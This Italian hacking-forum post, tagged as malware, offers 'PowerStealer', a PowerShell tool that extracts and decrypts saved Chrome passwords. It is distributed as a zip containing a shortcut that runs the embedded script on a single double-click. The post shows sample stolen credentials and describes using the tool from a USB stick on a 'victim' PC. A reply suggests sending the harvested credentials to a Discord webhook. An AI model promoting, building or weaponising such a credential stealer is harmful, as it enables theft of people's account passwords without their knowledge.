Tool Malware Estrazione password Chrome con un click PowerStealer

JunkCoder

Moderatore
5 Giugno 2020
1,646
25
1,452
603
Ultima modifica:
Ho realizzato questo script sia come sfida che per fare pratica con PowerShell. La sfida consisteva nell'usare solo PS (senza compilare C# o VB) per il task di estrazione e decodifica delle password salvate di Google Chrome. Mentre per AES GCM sono riuscito ad inventarmi qualcosa per fare tutto in PS, per SQLite ho dovuto usare una libreria esterna in quanto Microsoft non ne propone una built-in con il framework e non ci sono dll utilizzabili nel sistema di default.

Nel pacchetto allegato vi sono 3 file:
  • pows.ps1 è lo script per intero, di default non parte con doppio click, andrebbe eseguito manualmente con powershell (è incluso per facilitarvi la consultazione del codice)
  • pows_shortcut è una shortcut speciale: contiene il codice dello script e viene immediatamente eseguito appena viene fatto doppio click (non necessita che il file ps1 sia nei paraggi, è embedded al suo interno)
  • System.Data.SQLite.dll è necessaria per l'estrazione dei login, deve trovarsi in un percorso raggiungibile dallo script, non è eseguibile dall'utente cliccando
Lo script estrae le credenziali e le salva nella stessa cartella in un file .txt chiamato result, questo comportamento può essere modificato da script.

La password dell'archivio è infected

Il file ps1 e la shortcut possono essere rinominati a piacere in qualunque momento, per rinominare la DLL invece va aggiornato il nome nello script.

Esempio di estrazione dati prodotto:
Codice:
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
URL: https://www.facebook.com/
Name: publicuserlol
Pass: secretpassword123
--------------
URL: https://outlook.com/
Name: [email protected]
Pass: superhidden321!

Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\SecondProfile\Login Data
URL: https://www.facebook.com/
Name: anotherfbuser
Pass: facebooksucks999

Nota: per funzionare su OS che di default hanno .net framework più vecchio di 4.6 (es. Windows 7) potrebbe essere necessario sostituire System.Data.SQLite.dll con una versione precedente, potete scaricarla dal sito ufficiale di sqlite per .net.

Nota2: i più smanettoni possono aggiornare lo script in modo da scaricare la dll da remoto, non l'ho fatto per due motivi: volevo fosse funzionante offline e per evitare di delegare l'hosting della dll all'utente l'unica alternativa era scaricare tutto il bundle dal sito ufficiale, il che mi sembrava ancora più sporco dovendo fare unzip e seminando un sacco di file in temp.

Esempio (lamer) d'uso: inserire la shortcut e la dll su una USB, doppio click sulla shortcut nel pc vittima... profit.
 

Allegati

  • PowerStealer.zip
    873.6 KB · Visualizzazioni: 18
Oltre che alla dll scaricata da remoto puoi inserire un discord webhook url per ricevere le credenziali su un bot discord... però non pubblicarlo weaponizzato, sennò arrivano quelli che vogliono attaccare con i ransomware che leakano la decryption key. Sul forum lascia solo questa variante in caso